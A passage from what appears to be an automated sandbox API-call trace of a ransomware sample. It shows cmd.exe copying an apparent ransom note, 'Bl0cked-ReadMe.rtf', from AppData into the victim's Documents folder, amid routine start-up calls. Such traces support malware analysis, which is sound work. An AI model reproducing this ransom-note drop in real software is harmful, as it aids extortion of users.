CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.930] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.930] exit (_Code=0) Process: id = "640" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35108 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35109 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35110 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35111 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35112 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35113 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35114 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35115 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35116 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35117 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35595 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35596 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35597 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35598 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35599 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 35600 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35601 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35602 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35603 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35604 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35605 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35606 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35607 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35608 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35609 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 35610 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35611 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35612 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35613 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35614 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35615 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35616 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35617 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35618 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 880 os_tid = 0xb20 [0235.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fce4 | out: lpSystemTimeAsFileTime=0x14fce4*(dwLowDateTime=0xbff11ec0, dwHighDateTime=0x1d440a9)) [0235.683] GetCurrentProcessId () returned 0xb04 [0235.683] GetCurrentThreadId () returned 0xb20 [0235.683] GetTickCount () returned 0x40b26 [0235.683] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcdc | out: lpPerformanceCount=0x14fcdc*=29247262033) returned 1 [0235.684] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.684] __set_app_type (_Type=0x1) [0235.684] __p__fmode () returned 0x76b331f4 [0235.684] __p__commode () returned 0x76b331fc [0235.684] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.684] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.684] GetCurrentThreadId () returned 0xb20 [0235.684] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb20) returned 0x38 [0235.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.685] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.685] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.685] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc74 | out: phkResult=0x14fc74*=0x0) returned 0x2 [0235.685] VirtualQuery (in: lpAddress=0x14fcab, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.685] GetConsoleOutputCP () returned 0x1b5 [0235.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.685] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.686] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.686] GetEnvironmentStringsW () returned 0x1a0168* [0235.686] FreeEnvironmentStringsW (penv=0x1a0168) returned 1 [0235.686] GetEnvironmentStringsW () returned 0x1a0168* [0235.686] FreeEnvironmentStringsW (penv=0x1a0168) returned 1 [0235.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebe4 | out: phkResult=0x14ebe4*=0x40) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x90, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x0, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegCloseKey (hKey=0x40) returned 0x0 [0235.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebe4 | out: phkResult=0x14ebe4*=0x40) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x0, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegCloseKey (hKey=0x40) returned 0x0 [0235.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0235.687] srand (_Seed=0x5b8863c3) [0235.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0235.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0235.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.688] GetEnvironmentStringsW () returned 0x1a22b8* [0235.689] FreeEnvironmentStringsW (penv=0x1a22b8) returned 1 [0235.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f9b0, lpFilePart=0x14f9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f9ac*="Desktop") returned 0x18 [0235.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.689] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.689] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.690] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.690] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.690] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.690] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.690] GetEnvironmentStringsW () returned 0x1a2ad8* [0235.690] FreeEnvironmentStringsW (penv=0x1a2ad8) returned 1 [0235.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.690] GetConsoleOutputCP () returned 0x1b5 [0235.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.690] GetUserDefaultLCID () returned 0x409 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14faf0, cchData=128 | out: lpLCData="0") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14faf0, cchData=128 | out: lpLCData="0") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14faf0, cchData=128 | out: lpLCData="1") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.692] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.692] GetConsoleTitleW (in: lpConsoleTitle=0x1908d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.693] _wcsicmp (_String1="type", _String2=")") returned 75 [0235.693] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0235.693] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0235.693] _wcsicmp (_String1="IF", _String2="type") returned -11 [0235.693] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0235.693] _wcsicmp (_String1="REM", _String2="type") returned -2 [0235.693] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] GetFileType (hFile=0x7) returned 0x2 [0235.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f9e8 | out: lpMode=0x14f9e8) returned 1 [0235.698] _dup (_FileHandle=1) returned 3 [0235.698] _close (_FileHandle=1) returned 0 [0235.698] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0235.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f9b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0235.699] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0235.699] GetConsoleTitleW (in: lpConsoleTitle=0x14f7e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.699] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0235.699] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0235.699] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0235.699] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0235.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.700] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f34c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f34c) returned 0x190e50 [0235.701] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0235.701] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0235.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0235.701] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e258, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0235.701] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] GetFileType (hFile=0x54) returned 0x1 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e2b0 | out: lpFileSizeHigh=0x14e2b0*=0x0) returned 0x1632 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.701] GetFileType (hFile=0x4c) 